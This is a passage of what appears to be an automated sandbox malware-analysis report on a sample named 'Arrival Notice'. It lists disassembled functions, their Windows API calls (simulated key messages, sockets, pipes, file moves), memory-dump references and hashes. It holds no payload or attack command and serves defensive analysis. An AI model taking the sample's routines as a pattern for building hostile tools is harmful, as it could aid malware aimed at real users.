                  • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0041ADBB
                  • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0041ADD8
                  • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0041AE17
                  • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0041AE38
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: MessagePost$KeyboardState$Parent
                  • String ID:
                  • API String ID: 87235514-0
                  • Opcode ID: af2d00c1f3d52bc6b05cb17285054fe93ad4529f22796caef1eed5062a955c8b
                  • Instruction ID: 9fa2a7927674832c6d9117dfc598b772e7f82c109eed7476d5e3fc972824432b
                  • Opcode Fuzzy Hash: af2d00c1f3d52bc6b05cb17285054fe93ad4529f22796caef1eed5062a955c8b
                  • Instruction Fuzzy Hash: 1451F7B05457D13DFB3283348C45BFB7EA95B46304F08848AE0D9469C2C3A8ECE8D75A
                  Function 003E542E Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • GetConsoleCP.KERNEL32(003F3CD6,?,?,?,?,?,?,?,?,003E5BA3,?,?,003F3CD6,?,?), ref: 003E5470
                  • __fassign.LIBCMT ref: 003E54EB
                  • __fassign.LIBCMT ref: 003E5506
                  • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,003F3CD6,00000005,00000000,00000000), ref: 003E552C
                  • WriteFile.KERNEL32(?,003F3CD6,00000000,003E5BA3,00000000,?,?,?,?,?,?,?,?,?,003E5BA3,?), ref: 003E554B
                  • WriteFile.KERNEL32(?,?,00000001,003E5BA3,00000000,?,?,?,?,?,?,?,?,?,003E5BA3,?), ref: 003E5584
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                  • String ID:
                  • API String ID: 1324828854-0
                  • Opcode ID: 8638b9196e880cd1bfc55ec6eebdbfbbea0583b78110c3c3c7979a293d2b8738
                  • Instruction ID: 010cdfec67be0b2c9614e28d810ba2be07b5d6976074ada4b103b3863ed2ea39
                  • Opcode Fuzzy Hash: 8638b9196e880cd1bfc55ec6eebdbfbbea0583b78110c3c3c7979a293d2b8738
                  • Instruction Fuzzy Hash: E4510771A006989FDB11CFA9D885AEEBBF9EF09304F14462AF556E72D1D7309A40CB60
                  Function 004310B8 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0043304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0043307A
                    • Part of subcall function 0043304E: _wcslen.LIBCMT ref: 0043309B
                  • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00431112
                  • WSAGetLastError.WSOCK32 ref: 00431121
                  • WSAGetLastError.WSOCK32 ref: 004311C9
                  • closesocket.WSOCK32(00000000), ref: 004311F9
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                  • String ID:
                  • API String ID: 2675159561-0
                  • Opcode ID: fa33898da2c6e5e23d014e1eb7f83bcd0ab685813eb94528b562361a336187d9
                  • Instruction ID: 30c3359030f9719bafdd3a03c4aac9e778df54ab2d51bd25c2fcdf49d2e9876c
                  • Opcode Fuzzy Hash: fa33898da2c6e5e23d014e1eb7f83bcd0ab685813eb94528b562361a336187d9
                  • Instruction Fuzzy Hash: 4541D435600204AFDB109F14C885BEAB7E9EF49368F18806AFD159B2A1C778AD41CBE5
                  Function 0041CF00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0041DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0041CF22,?), ref: 0041DDFD
                    • Part of subcall function 0041DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0041CF22,?), ref: 0041DE16
                  • lstrcmpiW.KERNEL32(?,?), ref: 0041CF45
                  • MoveFileW.KERNEL32(?,?), ref: 0041CF7F
                  • _wcslen.LIBCMT ref: 0041D005
                  • _wcslen.LIBCMT ref: 0041D01B
                  • SHFileOperationW.SHELL32(?), ref: 0041D061
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                  • String ID: \*.*
                  • API String ID: 3164238972-1173974218
                  • Opcode ID: d6fadc068501b05c09f608249c766db55409fd248dd859f7fee69aa30545d618
                  • Instruction ID: bacd7a82b9a63dc4572e517828c56d3fbdd4fd9d2d8f445c68cf81663355cba6
                  • Opcode Fuzzy Hash: d6fadc068501b05c09f608249c766db55409fd248dd859f7fee69aa30545d618
                  • Instruction Fuzzy Hash: B0416675D452185FDF12EFA4DD81ADEB7B9AF08340F1000E7E509EB241EB34A685CB54
                  Function 00442DFD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                  Download Yara Rule
                  APIs
                  • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00442E1C
                  • GetWindowLongW.USER32(00000000,000000F0), ref: 00442E4F
                  • GetWindowLongW.USER32(00000000,000000F0), ref: 00442E84
                  • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00442EB6
                  • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00442EE0
                  • GetWindowLongW.USER32(00000000,000000F0), ref: 00442EF1
                  • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00442F0B
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: LongWindow$MessageSend
                  • String ID:
                  • API String ID: 2178440468-0
                  • Opcode ID: e1b51ef1aa60beff1142424ba78acdc36d09f5926ac5479b8a57195b28c1b1f9
                  • Instruction ID: 283ac9d05af612a974fcbc18479ef03fec8b8ae3e3a15fcf3327bac82352ee13
                  • Opcode Fuzzy Hash: e1b51ef1aa60beff1142424ba78acdc36d09f5926ac5479b8a57195b28c1b1f9
                  • Instruction Fuzzy Hash: 83312634605150AFEB20CF58DD84F6A37E4FB4A710FA90166F9148F2B2CBB5AC41DB09
                  Function 00417726 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                  Download Yara Rule
                  APIs
                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00417769
                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0041778F
                  • SysAllocString.OLEAUT32(00000000), ref: 00417792
                  • SysAllocString.OLEAUT32(?), ref: 004177B0
                  • SysFreeString.OLEAUT32(?), ref: 004177B9
                  • StringFromGUID2.OLE32(?,?,00000028), ref: 004177DE
                  • SysAllocString.OLEAUT32(?), ref: 004177EC
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                  • String ID:
                  • API String ID: 3761583154-0
                  • Opcode ID: f64c57c2d4a5c160acbb7b5680cd849bc404b27c6619f761634eec633d4a1424
                  • Instruction ID: ca5accc5910acbc428482ea3b14b0ed1be968c8cfc64df2b8ace0fb600ce6d7f
                  • Opcode Fuzzy Hash: f64c57c2d4a5c160acbb7b5680cd849bc404b27c6619f761634eec633d4a1424
                  • Instruction Fuzzy Hash: 4D21CC756051196FDF10DFA8CC84DFB77BCEB05364B044026F925DB291D674EC818768
                  Function 004177FD Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                  Download Yara Rule
                  APIs
                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00417842
                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00417868
                  • SysAllocString.OLEAUT32(00000000), ref: 0041786B
                  • SysAllocString.OLEAUT32 ref: 0041788C
                  • SysFreeString.OLEAUT32 ref: 00417895
                  • StringFromGUID2.OLE32(?,?,00000028), ref: 004178AF
                  • SysAllocString.OLEAUT32(?), ref: 004178BD
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                  • String ID:
                  • API String ID: 3761583154-0
                  • Opcode ID: 46e722372fc211f8f794a0c5c50267169d282eeb2057e00894290db291061beb
                  • Instruction ID: 956635d9ed741483d2110c035d870142fb787933b2d8772191a7be6ff8850907
                  • Opcode Fuzzy Hash: 46e722372fc211f8f794a0c5c50267169d282eeb2057e00894290db291061beb
                  • Instruction Fuzzy Hash: A7213035609204AFDB10AFB8DC89DEB77BCEB097607148126F915CB2A1D678DC85CB78
                  Function 004204D2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                  Download Yara Rule
                  APIs
                  • GetStdHandle.KERNEL32(0000000C), ref: 004204F2
                  • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0042052E
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: CreateHandlePipe
                  • String ID: nul
                  • API String ID: 1424370930-2873401336
                  • Opcode ID: 650e9bcedd8fad358802c32ac33b6eb9a5c1a0132516a14fdc94c2f988a34f8f
                  • Instruction ID: 0122a0d0e9d4b0955dfb242832283081549caf7596c86a61c776f9d4461ecd63
                  • Opcode Fuzzy Hash: 650e9bcedd8fad358802c32ac33b6eb9a5c1a0132516a14fdc94c2f988a34f8f
                  • Instruction Fuzzy Hash: 69218275700315ABDB20CF29EC44A9A77F4BF45724F604A2AF8A1D72E1D7B49980CF68
                  Function 004205A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                  Download Yara Rule
                  APIs
                  • GetStdHandle.KERNEL32(000000F6), ref: 004205C6
                  • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00420601
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: CreateHandlePipe
                  • String ID: nul
                  • API String ID: 1424370930-2873401336
                  • Opcode ID: e65d661f25841f6e406fa65fe3e7d47437d345443dddeccfbcf593da12272175
                  • Instruction ID: 46d8dddae2d106502d912a2adc32224b2ba4ddca635a41057fa7cf7118d03945
                  • Opcode Fuzzy Hash: e65d661f25841f6e406fa65fe3e7d47437d345443dddeccfbcf593da12272175
                  • Instruction Fuzzy Hash: DC21A3357003259FDB208F69AC44A9B77E4BF85720F640A5AF8A1E33E1D7B49860CB18
                  Function 004440AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 003B600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 003B604C
                    • Part of subcall function 003B600E: GetStockObject.GDI32(00000011), ref: 003B6060
                    • Part of subcall function 003B600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 003B606A
                  • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00444112
                  • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0044411F
                  • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0044412A
                  • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00444139
                  • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00444145
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: MessageSend$CreateObjectStockWindow
                  • String ID: Msctls_Progress32
                  • API String ID: 1025951953-3636473452
                  • Opcode ID: ae3ac5719da8dd18002e8247476271b6856bc71b8d408c96249507bea41ba1f6
                  • Instruction ID: 0b8092d52230c75e47b6388a1417165de0d846fb09731ee54f02b9c0a1d11ce6
                  • Opcode Fuzzy Hash: ae3ac5719da8dd18002e8247476271b6856bc71b8d408c96249507bea41ba1f6
                  • Instruction Fuzzy Hash: 7D1190B2140219BEFF119F64CC86EEB7F5DEF08798F018112BA18A6150C6769C219BA8
                  Function 003ED7DF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                    • Part of subcall function 003ED7A3: _free.LIBCMT ref: 003ED7CC
                  • _free.LIBCMT ref: 003ED82D
                    • Part of subcall function 003E29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,003ED7D1,00000000,00000000,00000000,00000000,?,003ED7F8,00000000,00000007,00000000,?,003EDBF5,00000000), ref: 003E29DE
                    • Part of subcall function 003E29C8: GetLastError.KERNEL32(00000000,?,003ED7D1,00000000,00000000,00000000,00000000,?,003ED7F8,00000000,00000007,00000000,?,003EDBF5,00000000,00000000), ref: 003E29F0
                  • _free.LIBCMT ref: 003ED838
                  • _free.LIBCMT ref: 003ED843
                  • _free.LIBCMT ref: 003ED897
                  • _free.LIBCMT ref: 003ED8A2
                  • _free.LIBCMT ref: 003ED8AD
                  • _free.LIBCMT ref: 003ED8B8
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: _free$ErrorFreeHeapLast
                  • String ID:
                  • API String ID: 776569668-0
                  • Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                  • Instruction ID: 0c8b3e8711a8d181747dd8b42817036b14a00d01193a8e5d68d28c0ed51a7455
                  • Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
                  • Instruction Fuzzy Hash: 0A115171540BA8AAD523BFB2CC47FCB7BDC6F01700F400A25B699AE0D3DB7AB5154650
                  Function 0041DA5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON
                  Download Yara Rule
                  APIs
                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0041DA74
                  • LoadStringW.USER32(00000000), ref: 0041DA7B
                  • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0041DA91
                  • LoadStringW.USER32(00000000), ref: 0041DA98
                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0041DADC
                  Strings
                  • %s (%d) : ==> %s: %s %s, xrefs: 0041DAB9
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: HandleLoadModuleString$Message
                  • String ID: %s (%d) : ==> %s: %s %s
                  • API String ID: 4072794657-3128320259
                  • Opcode ID: b2705dfc821058e86e6b8b4193499ae2bd9f5876f6c4e59ccaf09f6e86eaf01d
                  • Instruction ID: 1d99d81826bf66dfda973ed91a58434d1d904d0087c1db6a3f88c6aa52496a3f
                  • Opcode Fuzzy Hash: b2705dfc821058e86e6b8b4193499ae2bd9f5876f6c4e59ccaf09f6e86eaf01d
                  • Instruction Fuzzy Hash: 400162F69002087FE750DBA09DC9EE7326CEB09305F4444A6B706E2041EA789E844F78
                  Function 0042096B Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON
                  Download Yara Rule
                  APIs
                  • InterlockedExchange.KERNEL32(010DF9C0,010DF9C0), ref: 0042097B
                  • EnterCriticalSection.KERNEL32(010DF9A0,00000000), ref: 0042098D
                  • TerminateThread.KERNEL32(010D9CB8,000001F6), ref: 0042099B
                  • WaitForSingleObject.KERNEL32(010D9CB8,000003E8), ref: 004209A9
                  • CloseHandle.KERNEL32(010D9CB8), ref: 004209B8
                  • InterlockedExchange.KERNEL32(010DF9C0,000001F6), ref: 004209C8
                  • LeaveCriticalSection.KERNEL32(010DF9A0), ref: 004209CF
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                  • String ID:
                  • API String ID: 3495660284-0
                  • Opcode ID: 0847c471ae0d76fa9fbaa8bd52e3e6949346535e11c550ef7a04e395b3e205ee
                  • Instruction ID: f51fe7c7defecf2e23fe6c1988488cb998835a052f0d643651b994cf5310da68
                  • Opcode Fuzzy Hash: 0847c471ae0d76fa9fbaa8bd52e3e6949346535e11c550ef7a04e395b3e205ee
                  • Instruction Fuzzy Hash: 10F03171543912BBD7915F94EECCBD67B35FF06702F841026F102908A1C7B59465CF98
                  Function 003B5D0A Relevance: 9.3, APIs: 6, Instructions: 276COMMON
                  Download Yara Rule
                  APIs
                  • GetClientRect.USER32(?,?), ref: 003B5D30
                  • GetWindowRect.USER32(?,?), ref: 003B5D71
                  • ScreenToClient.USER32(?,?), ref: 003B5D99
                  • GetClientRect.USER32(?,?), ref: 003B5ED7
                  • GetWindowRect.USER32(?,?), ref: 003B5EF8
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Rect$Client$Window$Screen
                  • String ID:
                  • API String ID: 1296646539-0
                  • Opcode ID: 6de29e324b3988908fb5a2d2792f2266ddfe666cbe11b4a296294b16af008e6d
                  • Instruction ID: e65f54c46be322f974774e9490c4385c48190e8a2c095624ff67362f1a8d4104
                  • Opcode Fuzzy Hash: 6de29e324b3988908fb5a2d2792f2266ddfe666cbe11b4a296294b16af008e6d
                  • Instruction Fuzzy Hash: A0B17738A00A4ADBDB11CFA8C4807FAB7F5FF48314F14851AE9A9D7A50DB30EA51CB54
                  Function 003E01B7 Relevance: 9.3, APIs: 6, Instructions: 269COMMON
                  Download Yara Rule
                  APIs
                  • __allrem.LIBCMT ref: 003E00BA
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003E00D6
                  • __allrem.LIBCMT ref: 003E00ED
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003E010B
                  • __allrem.LIBCMT ref: 003E0122
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003E0140
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                  • String ID:
                  • API String ID: 1992179935-0
                  • Opcode ID: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
                  • Instruction ID: d43e01aec580bdefcf3bd480fa0576136fe9d799202052bd6874d2571d8f6d39
                  • Opcode Fuzzy Hash: c0aa086816e9a6b10c8594d9af3fc1b6618250ddc70608c46d0048b3e4fbc764
                  • Instruction Fuzzy Hash: 9A8135766007569FE726AF2ADC81B6BB3A8AF41720F25433AF511DA3C1E7B0D9408780
                  Function 003E61FE Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                  Download Yara Rule
                  APIs
                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,003D82D9,003D82D9,?,?,?,003E644F,00000001,00000001,8BE85006), ref: 003E6258
